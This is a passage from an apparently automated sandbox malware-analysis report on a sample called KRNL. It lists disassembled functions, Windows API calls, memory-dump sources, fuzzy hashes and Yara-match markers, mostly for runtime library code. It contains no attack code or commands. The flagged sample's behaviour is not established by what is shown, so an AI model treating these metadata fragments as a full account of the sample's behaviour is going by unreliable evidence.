                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AdjustPointer
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1740715915-0
                                                                                                                                                                                                                                                          • Opcode ID: 933bfbe9267bb8dff0de8dec6a5d9246f1a581e5e1749ecf2683fc8c2fd93f91
                                                                                                                                                                                                                                                          • Instruction ID: 2d4179a66163b8028f5c1bd9e23ea5f88f828f1c7e0d9d398d6c6a674270c05f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 933bfbe9267bb8dff0de8dec6a5d9246f1a581e5e1749ecf2683fc8c2fd93f91
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4D51D17364570AEFEB299F54C991BBA73A6EF40710F14502DEA0647291D731ED81CB90
                                                                                                                                                                                                                                                          Function 006E7220 Relevance: 6.1, APIs: 4, Instructions: 129threadCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006E72C5
                                                                                                                                                                                                                                                          • std::_Throw_Cpp_error.LIBCPMT ref: 006E7395
                                                                                                                                                                                                                                                          • std::_Throw_Cpp_error.LIBCPMT ref: 006E73A3
                                                                                                                                                                                                                                                          • std::_Throw_Cpp_error.LIBCPMT ref: 006E73B1
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Cpp_errorThrow_std::_$CurrentThread
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2261580123-0
                                                                                                                                                                                                                                                          • Opcode ID: d84bc1c333bb0172b5a0cd114a46298ccf83f6ddcf1c56f96832921084f59115
                                                                                                                                                                                                                                                          • Instruction ID: 018311f600b65332b7589c60e7806c97970d9d203e802bfd0f58c2778fd51256
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d84bc1c333bb0172b5a0cd114a46298ccf83f6ddcf1c56f96832921084f59115
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 074124B1901385CBDB60DB26C8417AFB7A6BF44320F14463DD81647791EB30E805CBD1
                                                                                                                                                                                                                                                          Function 00701DC6 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 006FC021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,006FD895,?,00000000,-00000008), ref: 006FC082
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00701E2A
                                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 00701E31
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00701E6B
                                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 00701E72
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1913693674-0
                                                                                                                                                                                                                                                          • Opcode ID: f25dd0b7842dcf2fe754ff34bcddd8b0e39dee47ec876785c1dcb25568371d70
                                                                                                                                                                                                                                                          • Instruction ID: e32ca57ab662ea4217ef8587730b4fae0062c38fe3cdb8637493012fbabafb19
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f25dd0b7842dcf2fe754ff34bcddd8b0e39dee47ec876785c1dcb25568371d70
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 40219D71604219EFDB20AFA5C88187BB7E9FF003657908619FD19D7591E739EC008BA0
                                                                                                                                                                                                                                                          Function 006F2BA2 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 0254ae2127c9291d93c81fa772fb1481ddc97cceaf94a03920bc899282885eac
                                                                                                                                                                                                                                                          • Instruction ID: 743c1983a16e57fbd28b97eda628ff8145e1233a7b2fd939840e73b99f349af9
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0254ae2127c9291d93c81fa772fb1481ddc97cceaf94a03920bc899282885eac
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0021C27120420FAF8B60AF698CE19BA776BFF403647118518FB59D7250EB31EC41CBA4
                                                                                                                                                                                                                                                          Function 007031BE Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 007031C6
                                                                                                                                                                                                                                                            • Part of subcall function 006FC021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,006FD895,?,00000000,-00000008), ref: 006FC082
                                                                                                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 007031FE
                                                                                                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0070321E
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 158306478-0
                                                                                                                                                                                                                                                          • Opcode ID: 9e10e4241ecd073afe2940b235d17e5430b8760ebbfa7df8aaa74088f5458d20
                                                                                                                                                                                                                                                          • Instruction ID: a9086f0b60c8ade8bd266190ba8c979d4e71fcc7c679fa586c044d0fce26910a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9e10e4241ecd073afe2940b235d17e5430b8760ebbfa7df8aaa74088f5458d20
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1E11D6B1501119FEE7112BB5AC8ACFF6A9DEEC97947104219FA01D1181FF78EF0141B5
                                                                                                                                                                                                                                                          Function 0070ADA0 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,0070A2EF,00000000,00000001,00000000,?,?,00704390,?,00000000,00000000), ref: 0070ADB7
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,0070A2EF,00000000,00000001,00000000,?,?,00704390,?,00000000,00000000,?,?,?,00703CD6,00000000), ref: 0070ADC3
                                                                                                                                                                                                                                                            • Part of subcall function 0070AE20: CloseHandle.KERNEL32(FFFFFFFE,0070ADD3,?,0070A2EF,00000000,00000001,00000000,?,?,00704390,?,00000000,00000000,?,?), ref: 0070AE30
                                                                                                                                                                                                                                                          • ___initconout.LIBCMT ref: 0070ADD3
                                                                                                                                                                                                                                                            • Part of subcall function 0070ADF5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0070AD91,0070A2DC,?,?,00704390,?,00000000,00000000,?), ref: 0070AE08
                                                                                                                                                                                                                                                          • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,0070A2EF,00000000,00000001,00000000,?,?,00704390,?,00000000,00000000,?), ref: 0070ADE8
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2744216297-0
                                                                                                                                                                                                                                                          • Opcode ID: bf7924cf076a20245278e2d3a7418fe119e6b7ec593cca223ee7bda0efa26c35
                                                                                                                                                                                                                                                          • Instruction ID: 54fb4119b60394895a47349dd540aa8b5fabbcf1881a54a8a71d65eaf9f8c03a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bf7924cf076a20245278e2d3a7418fe119e6b7ec593cca223ee7bda0efa26c35
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ADF01236600229FBCF221FD9EC089DA3F66FF047A1F00C111FE08851A4D73AC8609B95
                                                                                                                                                                                                                                                          Function 006F04F5 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(?), ref: 006F0507
                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006F0516
                                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 006F051F
                                                                                                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 006F052C
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2933794660-0
                                                                                                                                                                                                                                                          • Opcode ID: aae8c9efb57ef37206f0982b3e69251400d5376f8765ff8d906e2a822d65b356
                                                                                                                                                                                                                                                          • Instruction ID: 624c8c8d1f7abbc2243d2be23e1d6b62d8ad55043a06f7365ffe7eb9ae28115f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aae8c9efb57ef37206f0982b3e69251400d5376f8765ff8d906e2a822d65b356
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48F05F74D1120DEBCB00DFB8DA499DEBBF4FF1C200B918995A452E6150EA34AB44DB54
                                                                                                                                                                                                                                                          Function 006FB992 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 120COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,006FB893,?,?,00000000,00000000,00000000,?), ref: 006FB9B7
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: EncodePointer
                                                                                                                                                                                                                                                          • String ID: MOC$RCC
                                                                                                                                                                                                                                                          • API String ID: 2118026453-2084237596
                                                                                                                                                                                                                                                          • Opcode ID: d195aa015f2ac5999505b50b75eca91b8d5512be5ff925cc25aa777128af3bd6
                                                                                                                                                                                                                                                          • Instruction ID: 8b49dbc0d829e7cd1ab3b9344a7dec2ba2566e6f805eba058c645a48167d4bfa
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d195aa015f2ac5999505b50b75eca91b8d5512be5ff925cc25aa777128af3bd6
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4241347290020DAFCF15DF98CC81AEEBBB6FF48300F189199FA14A7222D3759950DB91
                                                                                                                                                                                                                                                          Function 006FB1FE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 006FB475
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ___except_validate_context_record
                                                                                                                                                                                                                                                          • String ID: csm$csm
                                                                                                                                                                                                                                                          • API String ID: 3493665558-3733052814
                                                                                                                                                                                                                                                          • Opcode ID: 7232b2c04a180d64e1580780f949a13be7a56bad945d3ea80631022a9ce787bf
                                                                                                                                                                                                                                                          • Instruction ID: 6e1dd83ed214097eb2670d2ff6bff18461d0fc674b79f14ba522985c299029a0
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7232b2c04a180d64e1580780f949a13be7a56bad945d3ea80631022a9ce787bf
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B431D57250021DEBCF269F90CD448FE7B67FF09315B18965AFA544A222C33ADD61DB81
                                                                                                                                                                                                                                                          Function 00432AF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: MetricsSystem
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 4116985748-3916222277
                                                                                                                                                                                                                                                          • Opcode ID: a7e015fa189f20fae8a1e1574193bbbed12d41f97909a9eee6515be2d05f634e
                                                                                                                                                                                                                                                          • Instruction ID: d2e9c7bdcd16e3a15224797572231dfe0fa3dd802bd302cf10fb2ba368259f32
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a7e015fa189f20fae8a1e1574193bbbed12d41f97909a9eee6515be2d05f634e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 723192B49143148FDB00EF68DA85649BBF4BF89304F41852EE898DB360D3B4A958CF86
                                                                                                                                                                                                                                                          Function 006EB831 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 006EB8B9
                                                                                                                                                                                                                                                          • RaiseException.KERNEL32(?,?,?,?,?), ref: 006EB8DE
                                                                                                                                                                                                                                                            • Part of subcall function 006F060C: RaiseException.KERNEL32(E06D7363,00000001,00000003,006EF354,00000000,?,?,?,006EF354,006E3D4A,0071759C,006E3D4A), ref: 006F066D
                                                                                                                                                                                                                                                            • Part of subcall function 006F8353: IsProcessorFeaturePresent.KERNEL32(00000017,006F378B,?,?,?,?,00000000,?,?,?,006EB5AC,006EB4E0,00000000,?,?,006EB4E0), ref: 006F836F
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
                                                                                                                                                                                                                                                          • String ID: csm
                                                                                                                                                                                                                                                          • API String ID: 1924019822-1018135373
                                                                                                                                                                                                                                                          • Opcode ID: 37d591f8fb25c0d92a28ef4671773d1f64bf988a8bd3bf26604fa5e76cad3060
                                                                                                                                                                                                                                                          • Instruction ID: c3957d0d1d5e4f673619f74532783bb5e4c57914bfb5cba4ce5e8a39211888e7
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 37d591f8fb25c0d92a28ef4671773d1f64bf988a8bd3bf26604fa5e76cad3060
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DD215531E02358EBCF249F9AD945AEFB7BAAF54710F14540AE405AB350CB70AD458B81
                                                                                                                                                                                                                                                          Function 006EB46C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • ___std_exception_copy.LIBVCRUNTIME ref: 006E2673
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ___std_exception_copy
                                                                                                                                                                                                                                                          • String ID: bad array new length$ios_base::badbit set
                                                                                                                                                                                                                                                          • API String ID: 2659868963-1158432155
                                                                                                                                                                                                                                                          • Opcode ID: 89d66d885912260380967a078e3b07906f62e34dfe759b5ebeff4c6e92a05c79
                                                                                                                                                                                                                                                          • Instruction ID: a495ef1df2cbff79822e63290eb82af11f077fea2c9069ed9ed00fe9c6958118
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 89d66d885912260380967a078e3b07906f62e34dfe759b5ebeff4c6e92a05c79
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9F01DFF1609305EBDB14DF28D856A6B7BE9AF08318F11892CF45D8B381D379E848CB85
                                                                                                                                                                                                                                                          Function 006E2610 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
